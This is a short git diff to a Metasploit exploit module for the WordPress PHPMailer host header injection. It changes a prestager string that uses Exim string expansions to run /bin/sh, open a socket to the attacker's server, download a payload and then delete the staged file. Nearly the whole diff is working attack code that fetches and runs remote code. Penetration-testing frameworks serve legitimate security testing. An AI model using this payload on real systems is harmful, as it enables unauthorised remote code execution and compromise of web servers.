diff --git a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
index faa6fc31f3..05b3aedb02 100644
--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -111,9 +111,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # This is basically sh -c `wget` implemented using Exim string expansions
     # Badchars we can't encode away: \ for \n (newline) and : outside strings
-    prestager << "/bin/sh -c ${reduce{get #{get_resource} http/1.0}" \
-      '{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket' \
-      "{inet:#{srvhost_addr}:#{srvport}}{$item$value$value}}}}}}"
+    prestager << '/bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}' \
+      "{${readsocket{inet:#{srvhost_addr}:#{srvport}}" \
+      "{get #{get_resource} http/1.0$value$value}}}}}}"
 
     # CmdStager should rm the file, but it blocks on the payload, so we do it
     prestager << "/bin/rm -f #{cmdstager_path}"